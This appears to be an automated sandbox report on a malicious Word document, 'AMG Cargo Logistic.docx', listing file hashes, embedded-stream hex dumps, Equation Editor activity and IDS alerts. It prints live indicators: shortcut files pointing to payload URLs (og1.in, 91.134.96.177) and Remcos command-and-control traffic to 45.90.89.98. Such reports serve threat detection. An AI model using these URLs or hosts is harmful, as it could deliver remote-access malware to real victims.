SHA-256:F6D29D0D07376D23E1BA23F1D4F4EB184A5E7650DABD5C7870873302490D59D5
SHA-512:2355DBBEA2A9C3747A3637A41EB927D79C6A94A5F188F92867E2BE2AF70C1EA64154028D0F2566C145FA09C18F5B99666C4CDAD2CA81EB3C8E4E28F8F6D2873C
Malicious:false
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows 95 Internet shortcut text (URL=<https://og1.in/S7UYq0>), ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):47
Entropy (8bit):4.681832468514789
Encrypted:false
SSDEEP:3:HRAbABGQYm2fjUzv:HRYFVm4ozv
MD5:A53EC7DED13AD3FF40ABCD534C27D766
SHA1:22D3B5EBEBD017DAA951BF1826D62952BDC7CDF7
SHA-256:C77D6054871DF78330ECD9A20E552469C8BC6A6DF8A1046BEF2D444CF5285C13
SHA-512:E1B3B7ECCB85983BDB7A6FDFCE80C1CDADD4F7CED8F90C670D428963982331DAD5250CA9FA472A8BE8B4D34AD9AD9DBDDE97B37B29DB98BAC33A7419DADE93D6
Malicious:true
Preview:[InternetShortcut]..URL=https://og1.in/S7UYq0..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Generic INItialization configuration [misc]
Category:dropped
Size (bytes):112
Entropy (8bit):5.043613351489073
Encrypted:false
SSDEEP:3:bDvKDgQFlTRQSLmiYeHLUlmxWv/1YeHLUlv:btQFZG/q
MD5:9CB11BF261F37B0812DCAB138E7BEFE4
SHA1:AC5DF649B947AF34E3C9D0D80AF29BF65D58D5AE
SHA-256:3AE975918402CAA0CBE6B4F7457A09215412A5089B2370A6F1A5170292D254F4
SHA-512:4A4DE735548E3FCEB838B41FA531D03FD41FE960B03F334D2FB02BF75C471BA5C04D5675199F94152F560FEB3B02F3163D5798EFF49DD0B20949BD4587F5E4FC
Malicious:false
Preview:[folders]..S7UYq0.url=0..uc on 91.134.96.177.url=0..AMG Cargo Logistic.LNK=0..[misc]..AMG Cargo Logistic.LNK=0..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows 95 Internet shortcut text (URL=<http://91.134.96.177/80/uc/>), ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):53
Entropy (8bit):4.659445162429413
Encrypted:false
SSDEEP:3:HRAbABGQYm//WSKdVKQGKov:HRYFVm//VKaQGKov
MD5:B2B5585FFBBE6ECEAC7B9A54F231EBCA
SHA1:D7F347C319960D54350384AB53E39188CD69AC22
SHA-256:7B3A6AC8252C7A027AD0F19E3D54C074FF2CCCC1947E34326AAA905DA24D5077
SHA-512:AD89C45C5D5C8E69AAEB0BA1C5F03468F8BE5830806A1134CF2AA018B61118DF9B35932ABE17A9C7D2B81FE71BD949675C2C094262D3A74126E0A3C640360ABE
Malicious:true
Preview:[InternetShortcut]..URL=http://91.134.96.177/80/uc/..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707526
Encrypted:false
SSDEEP:3:vrJlaCkWtVyAHpAyYQGcWX2xKbylln:vdsCkWtpHS9VX/b+l
MD5:A604235065D4B469AB30855D5048A3E8
SHA1:618636A10771F211931A9D26063A08A50BFA4BDF
SHA-256:1C8E0165A83CCBF2B47064503AD0A7FF81C1573538A3E451534DB7BC99FB34D8
SHA-512:639ADFFD0E4AE6A86E49FB706E412887694804CB96C6E4C5C59F8194983957326C124CCB14AD7D56B63D401762633EAECE5C1EB3FF2A7878F1C1E4796E0CE523
Malicious:false
Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):247044
Entropy (8bit):3.7540611984178978
Encrypted:false
SSDEEP:6144:QT0K+XNr+WEx75gOUs5n7WgBzwmz7KTyXXcw5rN0gf:FK+Nr+WEbpL7BBzwS70yncw5rN0gf
MD5:AFA95FFEF9A1E2EE01B008DA56592B30
SHA1:9D5C767BB2F496377A5A797FC43E8C004530028C
SHA-256:4988DF74DF1AD4B83316BD4D9C110996BA2EB392C7C2ADB1422FFB60936611BE
SHA-512:632136F51D71D7632F70A5DADB1693801461C18C38357AD154B4BD51EE0D84E662952CE29B83996867C5716A2F8D3E325A693E88CD214B9383E9A2CE1ED57EF3
Malicious:true
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707526
Encrypted:false
SSDEEP:3:vrJlaCkWtVyAHpAyYQGcWX2xKbylln:vdsCkWtpHS9VX/b+l
MD5:A604235065D4B469AB30855D5048A3E8
SHA1:618636A10771F211931A9D26063A08A50BFA4BDF
SHA-256:1C8E0165A83CCBF2B47064503AD0A7FF81C1573538A3E451534DB7BC99FB34D8
SHA-512:639ADFFD0E4AE6A86E49FB706E412887694804CB96C6E4C5C59F8194983957326C124CCB14AD7D56B63D401762633EAECE5C1EB3FF2A7878F1C1E4796E0CE523
Malicious:false
File type:Microsoft Word 2007+
Entropy (8bit):7.994747969860824
TrID:
• Word Microsoft Office Open XML Format document (49504/1) 58.23%
• Word Microsoft Office Open XML Format document (27504/1) 32.35%
• ZIP compressed archive (8000/1) 9.41%
File name:AMG Cargo Logistic.docx
File size:788'502 bytes
MD5:cde646bbf76aa0cb430f71ec2408b4bd
SHA1:40fbea905916fc49bfcaf203b3b15e78d9053df5
SHA256:a91decdd65e45f46a226097d1331b51002c3c6120c5a2afdb7d29c5973166ce5
SHA512:22cea88742a8a11813bbc68fc661a5ed63bac3b20c4b8c718367737f3265c859a2506815f6a80fbc39c8ebbb4ebcae0adb7414e61c0660b66e7da94ec2002801
SSDEEP:12288:hNCRJClLkChwGm0LpsjYJ46gvycWL5c7PasQB2i4MYJv/u8wdyAxd6mzoGf2S2AM:h4ClKL0CjY7EDWQisQB2tXupdyZGt2AM
TLSH:88F42374E49ACDF3CE66F0B38661A4BCE6B4EEFC0645889365BD0345958E9A0F0D418F
                                                                                                                                                                                                File Content Preview:PK........~o>Y+..0............[Content_Types].xmlUT......f...f...f.V.j.@.}/.....i..J)....c.h.....%.7v&......SL".../.bu.3s4hu.;[<A...Z,..(..`:.....o.GQ )o...j.......V...X0.c-Z..IJ.-8.U......)....Q..j..z.. u...J..b....Rg..S..+.:.9$#.......N...\.....vZ...O..
                                                                                                                                                                                                Icon Hash:65e6a3a3afb7bdbf
                                                                                                                                                                                                Document Type:OpenXML
                                                                                                                                                                                                Number of OLE Files:2
                                                                                                                                                                                                Has Summary Info:
                                                                                                                                                                                                Application Name:
                                                                                                                                                                                                Encrypted Document:False
                                                                                                                                                                                                Contains Word Document Stream:True
                                                                                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                                                                Contains ObjectPool Stream:False
                                                                                                                                                                                                Flash Objects Count:0
                                                                                                                                                                                                Contains VBA Macros:False
                                                                                                                                                                                                Code Page:1252
                                                                                                                                                                                                Title:
                                                                                                                                                                                                Subject:
                                                                                                                                                                                                Author:91974
                                                                                                                                                                                                Keywords:
                                                                                                                                                                                                Template:Normal.dotm
                                                                                                                                                                                                Last Saved By:91974
                                                                                                                                                                                                 Revision Number:4
                                                                                                                                                                                                Total Edit Time:1
                                                                                                                                                                                                Last Printed:2024-07-15 15:30:47
                                                                                                                                                                                                Create Time:2024-09-30T08:11:00Z
                                                                                                                                                                                                Last Saved Time:2024-09-30T08:12:00Z
                                                                                                                                                                                                Number of Pages:1
                                                                                                                                                                                                Number of Words:0
                                                                                                                                                                                                Number of Characters:0
                                                                                                                                                                                                 Thumbnail:(embedded WMF/EMF thumbnail image; binary record data not reproduced. Recoverable text strings rendered in the thumbnail: "N ordre", "DATE", "SOLDE AU 02/01/2024", "WORMS ALGERIE SHIPPING SPA (WALSHIP)", "Caisse Annaba - 2024", "LIBELLES / DESIGNATIONS"; fonts referenced: Arial, Cambria, Calibri)
                                                                                                                                                                                                Creating Application:Microsoft Office Word
                                                                                                                                                                                                Security:0
                                                                                                                                                                                                Document Code Page:1252
                                                                                                                                                                                                Number of Lines:1
                                                                                                                                                                                                Number of Paragraphs:1
                                                                                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                                                                                Company:Grizli777
                                                                                                                                                                                                Contains Dirty Links:false
                                                                                                                                                                                                Shared Document:false
                                                                                                                                                                                                Changed Hyperlinks:false
                                                                                                                                                                                                Application Version:12.0000
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:114
                                                                                                                                                                                                Entropy:4.25248375192737
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x1Ole
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:20
                                                                                                                                                                                                Entropy:0.5689955935892812
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x3EPRINT
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                Stream Size:55488
                                                                                                                                                                                                Entropy:3.128894440734097
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . l . . . . . . . g . . . . + . . . . . . . . . . . . . f . . Z G . . E M F . . . . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ K . . h C . . F . . . , . . . . . . E M F + . @ . . . . . . . . . . . . . . . . X . . . X . . . F . . . \\ . . . P . . . E M F + " @ . . . . . . . . . . . @ . . . . . . . . . . $ @ . . . . . . . . . . 0 @ . . . . . . . . . . . . ? ! @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 67 00 00 00 0d 2b 00 00 db 0c 00 00 00 00 00 00 00 00 00 00 66 b6 00 00 5a 47 00 00 20 45 4d 46 00 00 01 00 c0 d8 00 00 5b 07 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 13 00 00 c8 19 00 00 d8 00 00 00 17 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 4b 03 00 68 43 04 00 46 00 00 00 2c 00 00 00 20 00 00 00 45 4d 46 2b 01 40 01 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x3ObjInfo
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:6
                                                                                                                                                                                                Entropy:1.2516291673878228
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . . .
                                                                                                                                                                                                Data Raw:00 00 03 00 01 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:248
                                                                                                                                                                                                Entropy:2.7990677635209242
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C a i s s e 2 0 2 4 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
                                                                                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a4 00 00 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:23536
                                                                                                                                                                                                Entropy:3.0728310684122637
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . [ . . . . . . . . . . P . . . . . . . X . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t C o r p o r a t i o n . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . @ . . . . c ? . @ . . . . F ` . . . . . . . . . . . G . . . Z . . . . . . . . ( . . . . . . . . . . n - . . . . . . . . . .
                                                                                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c0 5b 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 78 00 00 00 12 00 00 00 88 00 00 00 0b 00 00 00 a0 00 00 00 0c 00 00 00 ac 00 00 00 0d 00 00 00 b8 00 00 00 13 00 00 00 c4 00 00 00 11 00 00 00 cc 00 00 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:Workbook
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                Stream Size:28134
                                                                                                                                                                                                Entropy:4.264894359698655
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . # . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                Has Summary Info:
                                                                                                                                                                                                Application Name:
                                                                                                                                                                                                Encrypted Document:False
                                                                                                                                                                                                Contains Word Document Stream:True
                                                                                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                                                                Contains ObjectPool Stream:False
                                                                                                                                                                                                Flash Objects Count:0
                                                                                                                                                                                                Contains VBA Macros:False
                                                                                                                                                                                                Code Page:1252
                                                                                                                                                                                                Title:
                                                                                                                                                                                                Subject:
                                                                                                                                                                                                Author:91974
                                                                                                                                                                                                Keywords:
                                                                                                                                                                                                Template:Normal.dotm
                                                                                                                                                                                                Last Saved By:91974
                                                                                                                                                                                                Revision Number:4
                                                                                                                                                                                                Total Edit Time:1
                                                                                                                                                                                                Last Printed:2013-03-25 17:07:30
                                                                                                                                                                                                Create Time:2024-09-30T08:11:00Z
                                                                                                                                                                                                Last Saved Time:2024-09-30T08:12:00Z
                                                                                                                                                                                                Number of Pages:1
                                                                                                                                                                                                Number of Words:0
                                                                                                                                                                                                Number of Characters:0
                                                                                                                                                                                                Thumbnail:
                                                                                                                                                                                                Creating Application:Microsoft Office Word
                                                                                                                                                                                                Security:0
                                                                                                                                                                                                Document Code Page:1252
                                                                                                                                                                                                Number of Lines:1
                                                                                                                                                                                                Number of Paragraphs:1
                                                                                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                                                                                Company:Grizli777
                                                                                                                                                                                                Contains Dirty Links:false
                                                                                                                                                                                                Shared Document:false
                                                                                                                                                                                                Changed Hyperlinks:false
                                                                                                                                                                                                Application Version:12.0000
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:114
                                                                                                                                                                                                Entropy:4.25248375192737
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x1Ole
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:20
                                                                                                                                                                                                Entropy:0.5689955935892812
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x3EPRINT
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                Stream Size:1301576
                                                                                                                                                                                                Entropy:4.041786466342239
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E M F . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ K . . h C . . F . . . , . . . . . . E M F + . @ . . . . . . . . . . . . . . . . X . . . X . . . F . . . \\ . . . P . . . E M F + " @ . . . . . . . . . . . @ . . . . . . . . . . $ @ . . . . . . . . . . 0 @ . . . . . . . . . . . . ? ! @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 d6 1f 00 00 b1 1b 00 00 00 00 00 00 00 00 00 00 e7 86 00 00 08 c5 00 00 20 45 4d 46 00 00 01 00 48 dc 13 00 a3 09 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 13 00 00 c8 19 00 00 d8 00 00 00 17 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 4b 03 00 68 43 04 00 46 00 00 00 2c 00 00 00 20 00 00 00 45 4d 46 2b 01 40 01 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x3ObjInfo
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:6
                                                                                                                                                                                                Entropy:1.2516291673878228
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . . .
                                                                                                                                                                                                Data Raw:00 00 03 00 0d 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:244
                                                                                                                                                                                                Entropy:2.701136490257069
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\373\363\356\367\362\360\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                                                                                                                                Stream Size:90976
                                                                                                                                                                                                Entropy:3.617492259697482
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . . v
                                                                                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:MBD0018D4CE/\x1Ole
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:20
                                                                                                                                                                                                Entropy:0.5689955935892812
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:MBD0018D4CE/\x3ObjInfo
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:4
                                                                                                                                                                                                Entropy:0.8112781244591328
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . .
                                                                                                                                                                                                Data Raw:00 00 03 00
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:MBD0018D4CE/Contents
                                                                                                                                                                                                CLSID:
File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
Stream Size: 197671
Entropy: 6.989042939766534
Base64 Encoded: True
Data ASCII: C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path: Workbook
CLSID:
File Type: Applesoft BASIC program data, first line number 16 (content-sniffing guess; the leading bytes 09 08 10 00 00 06 05 00 are a BIFF8 BOF record for the workbook-globals substream of an Excel binary workbook, which is what the stream path says)
Stream Size: 125121
Entropy: 7.253073671715414
Base64 Encoded: True
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
Data Raw: 09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Timestamp                        SID      Signature                                               Severity  Source IP      Source Port  Dest IP        Dest Port  Protocol
2024-09-30T16:24:36.445590+0200  2020423  ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1  1         91.134.96.177  80           192.168.2.22   49173      TCP
2024-09-30T16:24:36.445590+0200  2020425  ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1  1         91.134.96.177  80           192.168.2.22   49173      TCP
2024-09-30T16:24:37.947876+0200  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection             1         192.168.2.22   49174        45.90.89.98    6845       TCP
2024-09-30T16:24:39.279885+0200  2803304  ETPRO MALWARE Common Downloader Header Pattern HCa      3         192.168.2.22   49176        178.237.33.50  80         TCP
2024-09-30T16:24:39.497208+0200  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection             1         192.168.2.22   49175        45.90.89.98    6845       TCP
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Sep 30, 2024 16:24:07.833563089 CEST  49163        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:07.833607912 CEST  443          49163      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:07.833743095 CEST  49163        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:07.839624882 CEST  49163        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:07.839636087 CEST  443          49163      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:08.484910011 CEST  443          49163      172.67.216.244  192.168.2.22
Sep 30, 2024 16:24:08.485112906 CEST  49163        443        192.168.2.22    172.67.216.244
Sep 30, 2024 16:24:08.490425110 CEST  49163        443        192.168.2.22    172.67.216.244
